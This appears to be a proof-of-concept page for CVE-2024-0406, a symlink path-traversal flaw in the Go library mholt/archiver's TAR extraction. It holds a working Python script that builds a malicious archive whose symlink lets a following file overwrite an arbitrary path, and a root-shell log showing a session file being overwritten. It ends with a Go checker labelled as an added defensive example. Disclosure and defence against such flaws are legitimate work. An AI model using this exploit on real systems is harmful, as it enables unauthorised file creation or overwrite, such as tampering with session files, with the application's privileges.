mholt/archiver — CVE-2024-0406

A vulnerability was discovered in the mholt/archiver package. The flaw lets an attacker craft a TAR file that, when extracted, may grant access to restricted files or directories. The issue permits creating or overwriting files with the privileges of the application using the library.

Affected versions: >=3.0.0 <= 3.5.1

Proof of Concept

Command Example

» python3 cve-2024-0406.py /tmp/sessions/admin/fake_session 
TAR file created at cve-2024-0406.tar with symlink pointing to /tmp/sessions/admin/fake_session

After uploading the archive to a target that extracts it with the Unarchive() function:

root@5af68317d6cb:/app/unarchive/admin# ls -al
total 8
drwxr-xr-x 2 root root 4096 Jun  1 08:20 .
drwxr-xr-x 3 root root 4096 Jun  1 07:02 ..
lrwxrwxrwx 1 root root   32 Jun  1 08:20 x -> /tmp/sessions/admin/fake_session
root@5af68317d6cb:/app/unarchive/admin# cat /tmp/sessions/admin/fake_session
<some-file-content-here>

Python Exploit Script

import tarfile
import sys
import io
 
def create_tar(tar_path, symlink_target):
    with tarfile.open(tar_path, 'w') as tar:
        # Create a symlink entry './x' pointing to symlink_target
        symlink_info = tarfile.TarInfo(name='./x')
        symlink_info.type = tarfile.SYMTYPE
        symlink_info.linkname = symlink_target
        tar.addfile(symlink_info)
        
        # Optional: Add a file with the same name 'x'
        payload_content = b'<some-file-content-here>'
        payload_info = tarfile.TarInfo(name='x')
        payload_info.size = len(payload_content)
        tar.addfile(payload_info, io.BytesIO(payload_content))
        
if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <symlink_target>")
        sys.exit(1)
    
    symlink_target = sys.argv[1]
    tar_path = "cve-2024-0406.tar"
 
    create_tar(tar_path, symlink_target)
    print(f"TAR file created at {tar_path} with symlink pointing to {symlink_target}")
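
A pre-extraction check for the archive shape shown above (a symlink entry `./x` followed by a regular file `x`), written in Go with the standard library only. It is an added example, not code from the original page or from mholt/archiver; `checkTar` and the constructed sample entries in `main` are assumptions made for illustration.

```go
package main

import (
	"archive/tar"
	"bytes"
	"fmt"
	"io"
	"path"
	"strings"
)

// checkTar (hypothetical helper) returns an error for the first entry that is
// unsafe to extract; symlink entries only, the case this page demonstrates.
func checkTar(r io.Reader) error {
	escapes := func(p string) bool { // p is already cleaned
		return path.IsAbs(p) || p == ".." || strings.HasPrefix(p, "../")
	}
	links := map[string]bool{} // cleaned names of symlink entries seen so far
	tr := tar.NewReader(r)
	for hdr, err := tr.Next(); err != io.EOF; hdr, err = tr.Next() {
		if err != nil {
			return err
		}
		name := path.Clean(hdr.Name) // "./x" and "x" both become "x"
		if escapes(name) {
			return fmt.Errorf("%q: path leaves destination", hdr.Name)
		}
		for p := name; p != "."; p = path.Dir(p) { // at or beneath an earlier link?
			if links[p] {
				return fmt.Errorf("%q: written through symlink %q", hdr.Name, p)
			}
		}
		if hdr.Typeflag == tar.TypeSymlink { // target resolves from the link's directory
			if path.IsAbs(hdr.Linkname) || escapes(path.Join(path.Dir(name), hdr.Linkname)) {
				return fmt.Errorf("%q: target %q leaves destination", hdr.Name, hdr.Linkname)
			}
			links[name] = true
		}
	}
	return nil
}

func main() { // constructed sample shaped like the PoC archive: link "./x", then file "x"
	var buf bytes.Buffer
	tw := tar.NewWriter(&buf)
	tw.WriteHeader(&tar.Header{Name: "./x", Typeflag: tar.TypeSymlink, Linkname: "/tmp/sessions/admin/fake_session"})
	tw.WriteHeader(&tar.Header{Name: "x", Typeflag: tar.TypeReg})
	tw.Close()
	fmt.Println(checkTar(&buf))
}
```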